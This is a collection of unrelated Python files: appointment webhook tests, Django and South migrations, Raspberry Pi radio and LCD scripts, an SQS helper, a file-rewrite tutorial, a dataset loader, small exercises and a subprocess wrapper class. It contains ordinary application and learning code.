    payload = {'appointments': [build_apt(i + 2, i + 1) for i in range(10)]}
    url = cli.server.app.router['webhook-appointment-mass'].url_for(company='thepublickey')
    r = await signed_request(cli, url, **payload)
    assert r.status == 200
    assert {'status': 'success'} == await r.json()
    assert 11 == await count(db_conn, sa_appointments)
    assert 1 == await count(db_conn, sa_services)

    # second batch: re-POST nine, delete two
    payload = {'appointments': [build_apt(i + 2, i + 1) for i in range(9)]}
    payload['appointments'].append({'id': 10, 'ss_method': 'DELETE'})
    payload['appointments'].append({'id': 11, 'ss_method': 'DELETE'})
    url = cli.server.app.router['webhook-appointment-mass'].url_for(company='thepublickey')
    r = await signed_request(cli, url, **payload)
    assert r.status == 200
    assert {'status': 'success'} == await r.json()
    assert 9 == await count(db_conn, sa_appointments)
    assert 1 == await count(db_conn, sa_services)
async def test_mass_apts_and_services(cli, db_conn, company):
    """Mass webhook where each appointment carries its own service id, so
    every POST also creates a service; the clear endpoint removes everything."""

    def build_apt(apt_id, day_offset):
        # service_id == appointment id: one new service per appointment
        return dict(
            id=apt_id,
            service_id=apt_id,
            service_name='test service',
            extra_attributes=[],
            colour='#000000',
            appointment_topic='testing appointment',
            attendees_max=42,
            attendees_count=4,
            attendees_current_ids=[1, 2, 3],
            start=str(datetime(2032, 1, 1, 12, 0, 0) + timedelta(days=day_offset)),
            finish=str(datetime(2032, 1, 1, 13, 0, 0) + timedelta(days=day_offset)),
            price=123.45,
            location='Whatever',
            ss_method='POST',
        )

    await create_appointment(db_conn, company, appointment_extra={'id': 1})
    assert 1 == await count(db_conn, sa_appointments)
    assert 1 == await count(db_conn, sa_services)

    payload = {'appointments': [build_apt(i + 2, i + 1) for i in range(10)]}
    url = cli.server.app.router['webhook-appointment-mass'].url_for(company='thepublickey')
    r = await signed_request(cli, url, **payload)
    assert r.status == 200
    assert {'status': 'success'} == await r.json()
    assert 11 == await count(db_conn, sa_appointments)
    assert 11 == await count(db_conn, sa_services)

    url = cli.server.app.router['webhook-appointment-clear'].url_for(company='thepublickey')
    r = await signed_request(cli, url, method_='DELETE')
    assert r.status == 200
    assert {'status': 'success'} == await r.json()
    assert 0 == await count(db_conn, sa_appointments)
    assert 0 == await count(db_conn, sa_services)
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    """Auto-generated South migration: create the Customers, Products, Orders,
    Orders_Products, General_Settings and Expenses tables for erp_app.

    Generated code — the table/field definitions below are left untouched.
    """

    def forwards(self, orm):
        """Create all erp_app tables and emit the post-create signals."""
        # Adding model 'Customers'
        db.create_table(u'erp_app_customers', (
            (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('title', self.gf('django.db.models.fields.CharField')(max_length=200)),
            ('first_name', self.gf('django.db.models.fields.CharField')(max_length=200)),
            ('middle_name', self.gf('django.db.models.fields.CharField')(max_length=200)),
            ('last_name', self.gf('django.db.models.fields.CharField')(max_length=200)),
            ('suffix', self.gf('django.db.models.fields.CharField')(max_length=200)),
            ('email', self.gf('django.db.models.fields.CharField')(max_length=200)),
            ('company', self.gf('django.db.models.fields.CharField')(max_length=200)),
            ('display_name', self.gf('django.db.models.fields.CharField')(max_length=200)),
            ('print_on_check_as', self.gf('django.db.models.fields.CharField')(max_length=200)),
            ('billing_street', self.gf('django.db.models.fields.CharField')(max_length=200)),
            ('billing_city', self.gf('django.db.models.fields.CharField')(max_length=200)),
            ('billing_state', self.gf('django.db.models.fields.CharField')(max_length=2)),
            ('billing_zip', self.gf('django.db.models.fields.CharField')(max_length=10)),
            ('billing_country', self.gf('django.db.models.fields.CharField')(max_length=200)),
            ('shipping_street', self.gf('django.db.models.fields.CharField')(max_length=200)),
            ('shipping_city', self.gf('django.db.models.fields.CharField')(max_length=200)),
            ('shipping_state', self.gf('django.db.models.fields.CharField')(max_length=2)),
            ('shipping_zip', self.gf('django.db.models.fields.CharField')(max_length=10)),
            ('shipping_country', self.gf('django.db.models.fields.CharField')(max_length=200)),
            ('other_details', self.gf('django.db.models.fields.CharField')(max_length=500)),
        ))
        db.send_create_signal(u'erp_app', ['Customers'])

        # Adding model 'Products'
        db.create_table(u'erp_app_products', (
            (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('name', self.gf('django.db.models.fields.CharField')(max_length=500)),
            ('description', self.gf('django.db.models.fields.CharField')(max_length=500)),
            ('price', self.gf('django.db.models.fields.DecimalField')(max_digits=20, decimal_places=2)),
        ))
        db.send_create_signal(u'erp_app', ['Products'])

        # Adding model 'Orders'
        db.create_table(u'erp_app_orders', (
            (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('customer', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['erp_app.Customers'])),
            ('invoice_number', self.gf('django.db.models.fields.IntegerField')()),
            ('invoice_creation_date', self.gf('django.db.models.fields.DateField')()),
            ('delivery_due_date', self.gf('django.db.models.fields.DateField')()),
            ('payment_due_date', self.gf('django.db.models.fields.DateField')()),
            ('custom_message', self.gf('django.db.models.fields.TextField')()),
        ))
        db.send_create_signal(u'erp_app', ['Orders'])

        # Adding model 'Orders_Products'
        db.create_table(u'erp_app_orders_products', (
            (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('order', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['erp_app.Orders'])),
            ('product', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['erp_app.Products'])),
            ('quantity', self.gf('django.db.models.fields.IntegerField')(default=0)),
        ))
        db.send_create_signal(u'erp_app', ['Orders_Products'])

        # Adding model 'General_Settings'
        db.create_table(u'erp_app_general_settings', (
            (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('first_name', self.gf('django.db.models.fields.CharField')(max_length=200)),
            ('last_name', self.gf('django.db.models.fields.CharField')(max_length=200)),
            ('company', self.gf('django.db.models.fields.CharField')(max_length=200)),
            ('street', self.gf('django.db.models.fields.CharField')(max_length=200)),
            ('city', self.gf('django.db.models.fields.CharField')(max_length=200)),
            ('state', self.gf('django.db.models.fields.CharField')(max_length=2)),
            ('zip_code', self.gf('django.db.models.fields.CharField')(max_length=10)),
        ))
        db.send_create_signal(u'erp_app', ['General_Settings'])

        # Adding model 'Expenses'
        db.create_table(u'erp_app_expenses', (
            (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('expense_name', self.gf('django.db.models.fields.CharField')(max_length=200)),
            ('description', self.gf('django.db.models.fields.CharField')(max_length=500)),
            ('date_paid', self.gf('django.db.models.fields.DateField')()),
            ('amount_paid', self.gf('django.db.models.fields.DecimalField')(max_digits=20, decimal_places=2)),
        ))
        db.send_create_signal(u'erp_app', ['Expenses'])

    def backwards(self, orm):
        """Drop all erp_app tables created by forwards()."""
        # Deleting model 'Customers'
        db.delete_table(u'erp_app_customers')

        # Deleting model 'Products'
        db.delete_table(u'erp_app_products')

        # Deleting model 'Orders'
        db.delete_table(u'erp_app_orders')

        # Deleting model 'Orders_Products'
        db.delete_table(u'erp_app_orders_products')

        # Deleting model 'General_Settings'
        db.delete_table(u'erp_app_general_settings')

        # Deleting model 'Expenses'
        db.delete_table(u'erp_app_expenses')

    # frozen ORM state used by South when running this migration
    models = {
        u'erp_app.customers': {
            'Meta': {'object_name': 'Customers'},
            'billing_city': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
            'billing_country': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
            'billing_state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
            'billing_street': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
            'billing_zip': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
            'company': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
            'display_name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
            'email': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
            'first_name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'last_name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
            'middle_name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
            'other_details': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
            'print_on_check_as': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
            'shipping_city': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
            'shipping_country': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
            'shipping_state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
            'shipping_street': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
            'shipping_zip': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
            'suffix': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
            'title': ('django.db.models.fields.CharField', [], {'max_length': '200'})
        },
        u'erp_app.expenses': {
            'Meta': {'object_name': 'Expenses'},
            'amount_paid': ('django.db.models.fields.DecimalField', [], {'max_digits': '20', 'decimal_places': '2'}),
            'date_paid': ('django.db.models.fields.DateField', [], {}),
            'description': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
            'expense_name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
        },
        u'erp_app.general_settings': {
            'Meta': {'object_name': 'General_Settings'},
            'city': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
            'company': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
            'first_name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'last_name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
            'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
            'street': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
            'zip_code': ('django.db.models.fields.CharField', [], {'max_length': '10'})
        },
        u'erp_app.orders': {
            'Meta': {'object_name': 'Orders'},
            'custom_message': ('django.db.models.fields.TextField', [], {}),
            'customer': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['erp_app.Customers']"}),
            'delivery_due_date': ('django.db.models.fields.DateField', [], {}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'invoice_creation_date': ('django.db.models.fields.DateField', [], {}),
            'invoice_number': ('django.db.models.fields.IntegerField', [], {}),
            'payment_due_date': ('django.db.models.fields.DateField', [], {})
        },
        u'erp_app.orders_products': {
            'Meta': {'object_name': 'Orders_Products'},
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'order': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['erp_app.Orders']"}),
            'product': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['erp_app.Products']"}),
            'quantity': ('django.db.models.fields.IntegerField', [], {'default': '0'})
        },
        u'erp_app.products': {
            'Meta': {'object_name': 'Products'},
            'description': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
            'price': ('django.db.models.fields.DecimalField', [], {'max_digits': '20', 'decimal_places': '2'})
        }
    }

    complete_apps = ['erp_app']
"""functions for controlling mpd/mpx radio via python"""
import subprocess
import requests
# Base URL of the Volumio REST command endpoint; command name is appended.
baseurl = "http://volumio.local/api/v1/commands/?cmd="
def reboot():
    """Stop playback cleanly, then reboot the Pi."""
    for command in ('mpc stop', 'reboot'):
        subprocess.call(command, shell=True)
def poweroff():
    """Stop playback cleanly, then shut the Pi down."""
    for command in ('mpc stop', 'poweroff'):
        subprocess.call(command, shell=True)
def volume_up():
    """Raise the volume one step via the Volumio web API."""
    requests.get("{0}{1}".format(baseurl, "volume&volume=plus"))
def volume_down():
    """Lower the volume one step via the Volumio web API."""
    requests.get("{0}{1}".format(baseurl, "volume&volume=minus"))
def pause():
    """Pause radio playback."""
    requests.get("{0}{1}".format(baseurl, "pause"))
def play(pos):
    """Start playback.

    NOTE(review): the *pos* argument is accepted but never used — presumably
    it was meant to select a playlist position; confirm against callers
    before removing it.
    """
    requests.get(baseurl + "play")
def toggle():
    """Toggle between play and pause."""
    requests.get("{0}{1}".format(baseurl, "toggle"))
def play_next():
    """Skip to the next station."""
    requests.get("{0}{1}".format(baseurl, "next"))
def play_previous():
    """play previous station"""
    # (docstring fixed: it was copy-pasted from play_next and said "next")
    requests.get(baseurl + "prev")
|
#!/usr/bin/python
from time import sleep
from Adafruit_CharLCDPlate import Adafruit_CharLCDPlate
import smbus
# initialize the LCD plate
# use busnum = 0 for raspi version 1 (256MB) and busnum = 1 for version 2
lcd = Adafruit_CharLCDPlate(busnum=0)

# clear display and show a greeting
lcd.clear()
lcd.message("Adafruit RGB LCD\nPlate w/Keypad!")
sleep(1)

# first loop: cycle the backlight through every colour, then on/off
for colour in (lcd.RED, lcd.YELLOW, lcd.GREEN, lcd.TEAL,
               lcd.BLUE, lcd.VIOLET, lcd.ON, lcd.OFF):
    lcd.backlight(colour)
    sleep(.5)

# button -> (message, backlight colour); SELECT shows no message
BUTTON_ACTIONS = (
    (lcd.LEFT, "Red Red Wine", lcd.RED),
    (lcd.UP, "Sita Sings \nthe blues", lcd.BLUE),
    (lcd.DOWN, "I see fields\nof green", lcd.GREEN),
    (lcd.RIGHT, "Purple mountain\n majesties", lcd.VIOLET),
    (lcd.SELECT, None, lcd.ON),
)

# main loop: poll each button in turn and react
while True:
    for button, text, colour in BUTTON_ACTIONS:
        if lcd.buttonPressed(button):
            lcd.clear()
            if text is not None:
                lcd.message(text)
            lcd.backlight(colour)
# Module for connecting to the SQS queues
import boto.sqs
from worker_settings import *
from boto.sqs.message import Message
# Module-level SQS connection and queue handle, created at import time from
# the credentials/region in worker_settings.
conn = boto.sqs.connect_to_region(
    AWS_REGION,
    aws_access_key_id=AWS_ACCESS_KEY_ID,
    aws_secret_access_key=AWS_SECRET_ACCESS_KEY)
q = conn.get_queue(QUEUE_NAME)
def create_Message(body):
    """Enqueue *body* as a new SQS message; return the write status."""
    message = Message()
    message.set_body(body)
    return q.write(message)
def receive_message():
    """Fetch one message (with all attributes) or None if the queue is empty.

    The visibility timeout is extended to 600s so the worker has time to
    finish processing before the message reappears.
    """
    messages = conn.receive_message(q, number_messages=1, attributes='All')
    if not messages:
        return None
    message = messages[0]
    message.change_visibility(600)
    return message
def delete_Message(m):
    """Remove message *m* from the queue."""
    q.delete_message(m)
def get_id(m):
    """Return the message body (used by the worker as the job id)."""
    return m.get_body()
def get_len():
    """Return the (approximate) number of messages in the queue."""
    return q.count()
|
"""Erase a file's contents and replace them with a line typed by the user.

Usage: python <script> <filename>
"""
from sys import argv

script, filename = argv

# BUG FIX: the original line was `print(f"We are going to erase", (unknown))`
# — `(unknown)` is an undefined name and crashed with a NameError before the
# script could do anything. Print the target filename instead.
print("We are going to erase", filename)
print("If you don't want to erase, hit ctr-c (^c)")
print("if you do want to destroy, hit RETURN.")
input("decision...? ")

print("Opening the file...")
target = open(filename, 'w')  # 'w' mode already truncates the file

print("Truncating the file. See yah!")
target_read = open(filename, 'r')  # second handle, used to read back at the end
target.truncate()  # redundant after open('w'), kept for the tutorial flow

print("Now we are going to insert three lines.")
line = input(""" Write here: """)

print("I'm going to write these to the file")
target.write(line)

print("And we now close the file")
target.close()  # flush so target_read sees the new contents

print("Here is what you just typed, by opening the file again in read mode")
print(target_read.read())
class Solution(object):
    """LeetCode 50: implement pow(x, n) for integer exponents."""

    def myPow(self, x, n):
        """Return x raised to the integer power n.

        :type x: float
        :type n: int
        :rtype: float

        Uses binary (fast) exponentiation — O(log n) multiplications instead
        of the original O(n) repeated-multiplication loop. Negative exponents
        invert the base once up front, matching the original's 1/x handling.
        """
        if n < 0:
            x = 1 / x
            n = -n
        result = 1
        while n:
            if n & 1:       # low bit set: fold the current power into result
                result *= x
            x *= x          # square the base for the next bit
            n >>= 1
        return result       # n == 0 yields 1, as before
def PowerDriver():
    """Quick manual check: print 4 ** 4 computed by Solution.myPow."""
    solver = Solution()
    base, exponent = 4, 4
    print(solver.myPow(base, exponent))


PowerDriver()
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2017-10-04 12:34
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Add a non-nullable FK 'id_objet' to Layer, backfilled with Objet pk 10."""

    dependencies = [
        ('carto', '0008_auto_20171004_1135'),
    ]

    operations = [
        migrations.AddField(
            model_name='layer',
            name='id_objet',
            # default=10 backfills existing rows; preserve_default=False keeps
            # the default out of the final model state
            field=models.ForeignKey(db_column='id_objet', default=10, on_delete=django.db.models.deletion.DO_NOTHING, to='carto.Objet'),
            preserve_default=False,
        ),
    ]
|
from __future__ import division
import os
import numpy as np
import OpenEXR
import torch
import torch.utils.data as data
from datasets import pms_transforms
from . import util
np.random.seed(0)
class UpsSynthTestDataset(data.Dataset):
    """Synthetic benchmark dataset for photometric stereo testing.

    Loads per-shape EXR normal maps and rendered EXR images plus the
    associated light directions, and returns tensors ready for evaluation.
    """

    def __init__(self, args, split='train'):
        self.root = os.path.join(args.bm_dir)
        self.split = split
        self.args = args
        # one entry per shape/material combination, e.g. 'shape/material'
        self.shape_list = util.read_list(os.path.join(self.root, '%s_mtrl_%s.txt' %
                                         (split, self.args.syn_obj)), sort=False)
        self.repeat = 1

    def _get_input_path(self, index):
        """Return (normal_path, image_paths, light_dirs) for sample *index*."""
        index = index // self.repeat
        shape, mtrl = self.shape_list[index].split('/')
        normal_path = os.path.join(self.root, 'EXR', shape + '.exr')
        if not os.path.exists(normal_path):
            # some shapes store the normal map one directory deeper
            normal_path = os.path.join(self.root, 'EXR', shape, shape + '.exr')
        img_dir = os.path.join(self.root, 'Images', self.shape_list[index])
        exr_dir = os.path.join(self.root, 'EXR', self.shape_list[index])
        img_list = util.read_list(os.path.join(img_dir, '%s_%s.txt' % (shape, mtrl)))
        data = np.genfromtxt(img_list, dtype='str', delimiter=' ')
        # NOTE: the original computed `dirs` here and again after row
        # selection; the pre-selection assignment was dead code and is removed.
        if hasattr(self.args, 'light_index') and self.args.light_index is not None:
            # an explicit lighting-subset index file was given
            index_path = os.path.join(self.root, 'Lighting_Index', self.args.light_index)
            select_idx = np.genfromtxt(index_path, dtype=int)
        else:
            select_idx = np.array(range(data.shape[0]))[:100]
        print('Image number: %d' % (len(select_idx)))
        data = data[select_idx, :]
        imgs = [os.path.join(exr_dir, img[:-8] + '.exr') for img in data[:, 0]]
        dirs = data[:, 1:4].astype(np.float32)  # light directions after selection
        return normal_path, imgs, dirs

    def __getitem__(self, index):
        """Load one sample: images, normal map, mask, light dirs/intensities."""
        np.random.seed(index)  # deterministic per-sample randomness
        normal_path, img_list, dirs = self._get_input_path(index)
        normal = util.exr_to_array(OpenEXR.InputFile(normal_path), 'normal')
        imgs = []
        for i in img_list:
            img = util.exr_to_array(OpenEXR.InputFile(i), 'color')
            imgs.append(img)
        img = np.concatenate(imgs, 2)
        h, w, c = img.shape
        mask = pms_transforms.normal_to_mask(normal, 0.2)
        normal = normal * mask.repeat(3, 2)
        # As the image intensities of the dark materials are very small, we scale
        # up the magnitude of the synthetic images.
        # BUG FIX: np.float was deprecated in NumPy 1.20 and removed in 1.24;
        # use the builtin float instead.
        ratio = float(mask.sum()) / (mask.shape[0] * mask.shape[1])  # object-area ratio
        thres = 0.02
        if img.mean() / ratio < thres:  # mean of the object region below 0.02
            # scale the mean value of the object region up to thres
            img *= thres / (img.mean() / ratio)
        img = (img * 1.5).clip(0, 2)
        if self.args.int_aug:
            # per-image random light intensities
            ints = pms_transforms.get_intensity(len(imgs))
            img = np.dot(img, np.diag(ints.reshape(-1)))
        else:
            ints = np.ones(c)
        if self.args.test_resc:
            img, normal = pms_transforms.rescale(img, normal, [self.args.test_h, self.args.test_w])
            mask = pms_transforms.rescale_single(mask, [self.args.test_h, self.args.test_w])
        # re-normalize normals to unit length (epsilon avoids division by zero)
        norm = np.sqrt((normal * normal).sum(2, keepdims=True))
        normal = normal / (norm + 1e-10)
        item = {'normal': normal, 'img': img, 'mask': mask}
        proxys = pms_transforms.get_proxy_features(self.args, normal, dirs)
        for k in proxys:
            item[k] = proxys[k]
        for k in item.keys():
            item[k] = pms_transforms.array_to_tensor(item[k])
        item['dirs'] = torch.from_numpy(dirs).view(-1, 1, 1).float()
        item['ints'] = torch.from_numpy(ints).view(-1, 1, 1).float()
        item['obj'] = '_'.join(self.shape_list[index // self.repeat].split('/'))
        item['path'] = os.path.join(self.root, 'Images', self.shape_list[index // self.repeat])
        return item

    def __len__(self):
        return len(self.shape_list) * self.repeat
|
# Generated by Django 3.1.3 on 2020-11-25 18:24
from django.db import migrations, models
class Migration(migrations.Migration):
    """Create the ContactInfo model (name, email, optional comment)."""

    dependencies = [
        ('test', '0001_initial'),
    ]

    operations = [
        migrations.CreateModel(
            name='ContactInfo',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=100)),
                ('email', models.EmailField(max_length=100)),
                ('comment', models.TextField(blank=True, max_length=1000)),
            ],
        ),
    ]
|
__author__ = 'alexey'

# Universe of elements for a weighted set-cover style problem (each "city"
# is just a colour name here).
cities = {'red', 'black', 'blue', 'green', 'yellow', 'turquoise', 'orange', 'purple', 'white'}

# Mapping (representative, subset) -> weight.
# NOTE(review): the 'black' entry lists 'green' twice, and its key element
# ('black') differs from the subset's first member — presumably intentional
# test data, but worth confirming against the consumer of this structure.
weighted_subsets = {('red', ('red', 'black', 'blue')): 1.,
                    ('black', ('green', 'black', 'blue', 'green')): 1.,
                    ('blue', ('green', 'black', 'blue', 'green')): 1.,
                    ('green', ('black', 'blue', 'green')): 1.,
                    ('yellow', ('yellow', 'turquoise')): 1.,
                    ('turquoise', ('yellow', 'turquoise')): 1.,
                    ('orange', ('turquoise', 'orange', 'purple')): 1.,
                    ('purple', ('orange', 'purple')): 1.,
                    ('white', ('white',)): 1.}
|
import matplotlib.pyplot as plt, numpy as np, pandas as pd
def graphs():
    """Plot hourly temperatures from weatherbug_scrape.csv.

    Saves two figures: TempZoomedIn.png (y-axis tight around the observed
    range) and TempZoomedOut.png (y-axis from 0). The first data row is
    skipped, matching the original behaviour.
    """
    df = pd.read_csv('weatherbug_scrape.csv')
    rows = df.values.tolist()[1:]  # skip the first row, as the original did
    # Idiom fix: comprehensions + min()/max() replace the manual index loop
    # and hand-rolled running min/max tracking.
    time = [row[1] for row in rows]
    temp = [int(row[2]) for row in rows]
    prec = [row[3] for row in rows]  # collected but unused, kept for parity
    mintemp = min(temp) if temp else 0
    maxtemp = max(temp) if temp else 0
    for i in range(2):
        # NOTE(review): as in the original, the second pass plots the same
        # line again onto the same figure; add plt.figure() here if truly
        # separate figures are wanted.
        plt.plot(time, temp)
        plt.xticks(rotation=270)
        plt.ylabel('Temperature')
        plt.xlabel('Hours')
        plt.title('Temperature for each hours')
        if i == 1:
            plt.yticks(np.arange(0, maxtemp + 5, 5))
            plt.savefig('TempZoomedOut.png')
        else:
            plt.yticks(np.arange(mintemp, maxtemp + 1, 1))
            plt.savefig('TempZoomedIn.png')
def my_print():
    """Print this module's __name__ preceded by a fixed label."""
    # label kept byte-for-byte from the original (typo included)
    print("pyhon.py:", __name__)
|
# Read three integers and print a comparison result.
# NOTE(review): the branching below looks inconsistent — when b == c it
# prints 'c' (same as b < c), and when all three are negative it prints
# a + b rather than a comparison; confirm the intended behaviour.
a=int(input('Introduceti 1 numar = '))
b=int(input('Introduceti 2 numar = '))
c=int(input('Introduceti 3 numar = '))
if(a>0 and b>0 and c>0):
    if(b>c):
        print('b')
    if(b<c):
        print('c')
    if(b==c):
        print('c')
if(a<0 and b<0 and c<0):
    print(a+b)
import shlex
import subprocess
from .global_storage import Globals
class UninitializedException(Exception):
    """Raised when an operation is attempted on a Process whose child has not
    been started."""

    def __init__(self, process):
        self.commandLine = process.commandLine

    def __str__(self):
        return f"Process is not initialized.\nCommand line for process: {self.commandLine}"
class TerminatedException(Exception):
    """Raised when an operation requires a live process but the child has
    already exited."""

    def __init__(self, process):
        self.commandLine = process.commandLine
        self.code = process.proc.returncode

    def __str__(self):
        # BUG FIX: the message was copy-pasted from UninitializedException and
        # wrongly claimed the process was "not initialized".
        return "Process has terminated.\nCommand line for process: {0}\nExit code: {1}".format(self.commandLine, self.code)
class VerificationFailedException(Exception):
    """Raised when a Process's verifier rejects the freshly started child."""

    def __init__(self, process):
        self.commandLine = process.commandLine

    def __str__(self):
        return f"Process verification failed.\nCommand line for process: {self.commandLine}"
class Process:
    """Wrapper around subprocess.Popen with internal ids, optional start-up
    verification, and helpers for waiting, signalling and terminating."""

    processes = []  # optional class-level registry of tracked processes
    next_id = 1     # monotonically increasing internal id

    @classmethod
    def add_process(cls, proc):
        """Register *proc* in the class-level registry.

        (Parameter renamed from the misleading `self` to `cls`.)
        """
        cls.processes.append(proc)

    def __init__(self, commandLine, verifier=None, **kwargs):
        self.internalId = Process.next_id
        Process.next_id += 1
        self.init(commandLine, verifier, **kwargs)

    def init(self, commandLine, verifier=None, **kwargs):
        """Start the child process described by *commandLine*.

        *commandLine* may be a string (split with shlex) or an argv list.
        Supported kwargs: shell, suppress_output, redirect_output,
        working_directory, environment_file.
        Raises VerificationFailedException if *verifier* rejects the child.
        """
        self.commandLine = commandLine
        if "shell" not in kwargs:
            kwargs["shell"] = False
        if kwargs["shell"] is True:
            kwargs["shell"] = Globals.default_shell
        if isinstance(commandLine, list):
            self.cmdString = " ".join(commandLine)
            args = commandLine
        else:
            self.cmdString = commandLine
            args = shlex.split(commandLine)
        print("$ {0}".format(self.cmdString))
        out_method = None
        if "suppress_output" in kwargs and kwargs["suppress_output"]:
            if "redirect_output" in kwargs:
                # BUG FIX: `ArgumentError` was an undefined name (raising it
                # produced a NameError); use the standard ValueError.
                raise ValueError("Suppress output and redirect output are mutually exclusive.")
            out_method = subprocess.PIPE
        elif "redirect_output" in kwargs:
            out_method = open(kwargs["redirect_output"], 'w')
        cwd = None
        if "working_directory" in kwargs:
            cwd = kwargs["working_directory"]
        env = None
        if "environment_file" in kwargs:
            # source the file in a shell and capture the resulting environment
            cmd = ". {0}; env".format(kwargs["environment_file"])
            shell = kwargs["shell"]
            if shell is False:
                shell = True
            if shell is True:
                shell = Globals.default_shell
            if shell is not True:
                cmd = [shell, "-c", '%s' % cmd]
                shell = False
            pipe = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=shell)
            output = pipe.communicate()[0]
            env = dict((line.decode().split("=", 1) for line in output.splitlines()))
        shell = kwargs["shell"]
        if shell is not False and shell is not True:
            # explicit shell binary requested: wrap the command ourselves
            args = [shell, "-c", ' '.join(args)]
            shell = False
        self.proc = subprocess.Popen(args, stdin=subprocess.PIPE, stdout=out_method, stderr=subprocess.STDOUT, cwd=cwd, env=env, shell=shell)
        self.verifier = verifier
        self.options = kwargs
        if verifier is not None:
            if not verifier.run(self):
                raise VerificationFailedException(self)

    def __del__(self):
        # best effort: don't leave the child running when the wrapper dies
        if hasattr(self, "proc") and self.proc is not None:
            self.proc.poll()
            if self.proc.returncode is None:
                self.force_terminate()

    def restart(self, timeout=10):
        """Terminate the current child (if any) and relaunch it with the same
        command line, verifier and options."""
        if hasattr(self, "proc") and self.proc is not None:
            if self.proc.poll() is None:
                self.force_terminate(timeout)
            if self.proc.stdin:
                self.proc.stdin.close()
            if self.proc.stdout:
                self.proc.stdout.close()
        self.init(self.commandLine, self.verifier, **self.options)

    def wait(self, timeout=None):
        """Block until the child exits (or *timeout* elapses); return the exit
        code. Raises UninitializedException if no child was started."""
        if hasattr(self, "proc") and self.proc is not None:
            notify = False
            if self.proc.returncode is None:
                notify = True
            else:
                return self.proc.returncode
            code = self.proc.wait(timeout)
            if self.proc.returncode is not None and notify and "process.exit" in Globals.messages:
                print("Process {0} exited with code {1}".format(self.cmdString, self.proc.returncode))
            return code
        else:
            raise UninitializedException(self)

    def write(self, stdin):
        """Write *stdin* to the child's standard input pipe."""
        if hasattr(self, "proc") and self.proc is not None and self.proc.stdin is not None:
            self.proc.stdin.write(stdin)
        else:
            raise UninitializedException(self)

    def code(self, blocking=True, timeout=None):
        """Return the exit code; None if still running (or the wait timed out).

        With blocking=True, waits up to *timeout* for the child to exit.
        """
        if hasattr(self, "proc") and self.proc is not None:
            code = self.proc.poll()
            if code is None and blocking:
                try:
                    # BUG FIX: the original fell through and returned None even
                    # after a successful blocking wait; return the real code.
                    return self.proc.wait(timeout)
                except subprocess.TimeoutExpired:
                    return None
            return code
        else:
            raise UninitializedException(self)

    def poll(self):
        """Non-blocking status refresh; return the exit code or None."""
        if not hasattr(self, "proc") or self.proc is None:
            raise UninitializedException(self)
        notify = False
        if self.proc.returncode is None:
            notify = True
        self.proc.poll()
        if self.proc.returncode is not None and notify and "process.exit" in Globals.messages:
            print("Process {0} exited with code {1}".format(self.cmdString, self.proc.returncode))
        return self.proc.returncode

    def signal(self, signal):
        """Send *signal* to a running child; TerminatedException if it exited."""
        if hasattr(self, "proc") and self.proc is not None and self.proc.returncode is None:
            self.proc.send_signal(signal)
        elif hasattr(self, "proc") and self.proc is not None:
            raise TerminatedException(self)
        else:
            raise UninitializedException(self)

    def pid(self):
        """Return the child's pid; TerminatedException once it has exited.

        BUG FIX: `pid` was defined twice in this class; the earlier, laxer
        definition was dead code (shadowed by this stricter one) and has been
        removed.
        """
        if hasattr(self, "proc") and self.proc is not None:
            if self.proc.poll() is not None:
                raise TerminatedException(self)
            else:
                return self.proc.pid
        else:
            raise UninitializedException(self)

    def terminate(self):
        """Politely ask a running child to stop (SIGTERM)."""
